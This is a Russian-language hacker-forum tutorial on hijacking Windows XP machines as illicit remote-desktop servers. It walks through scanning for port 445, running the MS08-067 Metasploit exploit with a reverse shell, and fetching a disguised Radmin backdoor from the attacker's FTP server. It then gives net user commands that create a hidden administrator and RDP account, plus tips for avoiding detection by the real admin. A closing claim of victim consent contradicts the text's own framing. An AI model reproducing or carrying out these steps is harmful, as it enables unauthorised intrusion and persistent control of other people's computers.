Начну с того порядком уже надоело читать как люди ищут дедик , просят их , я уже писал , что мы ходим по этим дедикам , проксям и тд и тп .
Сегодня мы рассмотрим метод добычи дедика по средством
Metasploit 3.2 с эксплойтом
MS08-067_netapi который использует уязвимость в службе SMB на
445 порту ,
уязвимы все Windows XP Pro sp2 и sp3 , скачать Metasploit 3.2 можно от сюда
http://www.metasploit.com/ , теперь скачаем сканер портов , я использую ip angry версии 2.21 она мне больше почему нравиться , офсайт
http://www.angryziber.com/w/Download , предположим что всё это мы уже скачали и установлил , запускаем сканер портов отметив в сканере порт 445 , именно он нам очень нужен , если просканировав сеть вы не увидели наличие открытого
445 порта в этой сети делать нечего , если же такой порт имеется то это очень даже хорошо !
Затем в Метасплойт в дальшейшем МС , находим эксплойт MS08-067_netapi жмём выполнить ,
Выбор цели Автомат ,
Payloads =generic/shell_reverse_tcp в RHOST ip жертвы и жмём применить , если уязвимость существует вы получите шелл (cmd.exe) удалённого компьютера , а в окошке
Sessions появиться ip жертвы
Предположим что FTP сервер у нас установлен и настроен , в cmd пишем
Код:
C:\>ftp
ftp> o
К 10.xx.xx.xx
Связь с 10.xx.xx.xx .
220 Welcome to 10.xx.xx.xx FTP service.
Пользователь (10.xx.xx.xx :(none)): anonymous
230 Login successful.
ftp>
Я настроил фтп на anonymous без пароля , ну вот мы зашли на свой фтп , смотрим где что у нас лежит командой
Видим что лежит наш уже приготовленный радмин-сервер sys.exe зальём его на комп жертвы
Файл залит , выходим с фтп и возвращаемся а наш шелл
смотрим залит ли файл
и запускаем его
Теперь запустим
RadminViewer и пробуем приконектится к нашему залитому и запущенному радмин-серверу
Замечательно конект есть , вбиваем наш пароль и вот мы дома
Теперь в радмине выбираем режим "Передачи файлов и загружаем наш terminal.exe , который сделает нам дедик на этом компьютере , хотя можно сделать учётки и в ручную
PHP код:
cmd
net user user pass /add
net localgroup Administrators user /add
net localgroup "Remote Desktop Users" user /add
net accounts /maxpwage:unlimited
exit
Далее радмином в режиме "Телнет " запустим наш terminal.exe
Затем "Подключение к удаленному рабочему столу" и пробуем приконектимся к нашему свежеиспечёному дедику
Как видите на скрине показанно , что если мы сейчас нажём "ДА" то админа может выкинуть из свой сессии , и он может заподозрить что то не ладное в своей системе , как правило это может , повторяют может лечиться перезагрузкой компьютера , но помогает не всегда ! 50/50
Вы спросите почему я сразу не залил terminal.exe , отвечаю буквы в шелле отображаются кракозябрами и скорость в дедике сами понимаете , так что мне важно был залить радмина , а там уже дело техники
Ну вот у нас есть дедик , на нём мы может установить прокси , фпт и многое многое другое , примерно в течении часа получилось 5 дедиков , я думаю это не плохо !
ps:
Всё тут написанное не претендует на статью , теперь от себя хочу сказать следующие этот метод всё равно требует времени и терпения , если кто то хочет жать на кнопку "применить в Местаслойте" и чтобы он вам выкидвал готовые деды ,
ИДЕТЕ ЛЕСОМ , дабы не сказать грубей !
Подробно про Метасплойт и эксплойты можно почитать тут
http://www.metasploit.com/
про
Terminal.exe здесь
http://forum.antichat.ru/thread36042.html
Ну вроде теперь думаю отпадут вопросы , как и что ,
ищите сети со статистическими ip и дедиков будет в огромном количестве , а данной статейке лишний раз видно как уязвимы продукты Microsoft , поэтому я уже давно в качестве севера юзаю
FreeBSD , а качестве десктопа
Ubuntu (Linux Mint /etc) , думаю и другим пользователям пора уже сделать выводы !! В ходе эксперимента все данные пользователя не тронуты и на данное действие было дано его письменного согласие .
источник
stopxaker.ru